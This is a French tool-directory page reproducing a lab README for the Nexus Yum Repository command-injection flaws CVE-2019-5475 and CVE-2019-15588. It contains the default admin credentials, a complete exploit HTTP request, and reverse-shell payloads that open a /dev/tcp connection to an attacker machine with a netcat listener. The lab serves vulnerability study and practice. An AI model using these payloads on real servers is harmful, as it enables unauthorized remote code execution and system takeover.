Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-5475 — CVE-2019-5475 靶场: RCE 命令注入漏洞 | Kitploit
Outils/GitHubGitHub/exp-docs/cve-2019-5475
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubexp-docs/cve-2019-5475

CVE-2019-5475

CVE-2019-5475 靶场: RCE 命令注入漏洞

Voir le dépôt
53il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-5475

Laboratoire CVE-2019-5475 et CVE-2019-15588 : vulnérabilité d'injection de commandes RCE


0x00 Contexte

CVE-2019-5475 est une vulnérabilité d'injection de commandes RCE dans le plugin intégré Yum Repository de Nexus, divulguée pour la première fois sur hackerone. Cependant, étant donné que le correctif officiel initial était incomplet, la vulnérabilité CVE-2019-15588 a été dérivée.

Ces deux vulnérabilités nécessitent une connexion en tant qu'admin pour être exploitées. Mais le mot de passe administrateur par défaut de Nexus, admin123, est souvent oublié et non modifié, ce qui facilite l'exploitation.

0x10 Environnement du laboratoire

0x20 Structure des répertoires

root@kitploit:~
CVE-2019-5475
├── nexus-yum-core .......... [Projet Maven pour le débogage : simule la saisie de createrepo ou mergerepo dans l'interface graphique Nexus]
├── nexus ................... [Répertoire de données monté pour le conteneur Nexus]
├── attacker ................ [Répertoire de construction de la machine attaquante]
│   └── Dockerfile .......... [Fichier Docker pour la construction de la machine attaquante]
├── docker-compose.yml ...... [Fichier de configuration Docker Compose]
├── imgs .................... [Images d'illustration pour le README]
└── README.md ............... [Ce fichier README]

0x40 Mise en place du laboratoire

  • Le système hôte doit avoir Docker et docker-compose préinstallés
  • Téléchargez ce dépôt : git clone https://github.com/lyy289065406/CVE-2019-5475
  • Ouvrez le répertoire de construction de Nexus : cd CVE-2019-5475
  • Construisez et exécutez Nexus : docker-compose up -d
  • Après environ 5 minutes, vous pouvez accéder à Nexus depuis le navigateur (BasicAuth est admin/admin123), avec les URLs suivantes :
NexusCVEURL
2.14.9CVE-2019-5475http://127.0.0.1:8009/nexus
2.14.14CVE-2019-15588http://127.0.0.1:8014/nexus

Ce laboratoire inclut également une machine attaquante 172.168.50.2, située sur le même réseau que les deux cibles, utilisée pour valider le reverse shell.

0x50 Validation du laboratoire [CVE-2019-5475]

0x51 PoC

Connectez-vous en tant qu'admin sur http://127.0.0.1:8009/nexus/#capabilities, puis dans Administration -> Capabilities -> Yum: Configuration -> Settings, vous trouverez le point d'injection RCE.

Les champs de saisie Path of "createrepo" et Path of "mergerepo" sont tous deux injectables. Le résultat de l'exécution peut être consulté dans Status.

Par exemple, en construisant le PoC bash -c id || python dans le champ d'injection createrepo, vous obtiendrez le résultat de la commande bash -c id dans Status : uid=200(nexus) gid=200(nexus) groups=200(nexus).

Avec BurpSuite, vous pouvez intercepter la requête PoC correspondante :

root@kitploit:~
PUT /nexus/service/siesta/capabilities/RANDOM_ID HTTP/1.1
Host: 127.0.0.1:8009
accept: application/json
Content-Type: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Connection: close

{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"bash -c id || python"}],"id":"RANDOM_ID"}

0x52 EXP

Ce point d'injection peut être facilement exploité pour créer un reverse shell :

  • Connectez-vous à la machine attaquante : docker exec -it -u root docker_attacker /bin/bash
  • Écoutez le reverse shell avec netcat : nc -lvvp 4444
  • Dans le champ d'injection createrepo, construisez la payload : bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || python

0x60 Validation du laboratoire [CVE-2019-15588]

0x61 PoC

Le point d'injection est le même que pour CVE-2019-5475. Ajustez le PoC en : /bin/bash -c id || /createrepo

0x62 EXP

Cette vulnérabilité peut être exploitée de la même manière pour un reverse shell :

  • Connectez-vous à la machine attaquante : docker exec -it -u root docker_attacker /bin/bash
  • Écoutez le reverse shell avec netcat : nc -lvvp 4444
  • Dans le champ d'injection createrepo, construisez la payload : /bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/172.168.50.2/4444 0>&1 || /createrepo

0x70 Correction des vulnérabilités

  • Pour CVE-2019-5475 : Premier correctif officiel
  • Pour CVE-2019-15588 : Deuxième correctif officiel

0x80 À propos de nexus-yum-core

nexus-yum-core est le fragment de code principal de Nexus lié à cette exploitation. Il est principalement utilisé pour déboguer et analyser directement les payloads depuis le backend, sans avoir à construire un service Nexus complet à partir des sources.

0x90 Références

  • https://paper.seebug.org/1260/
  • https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
Télécharger l’outil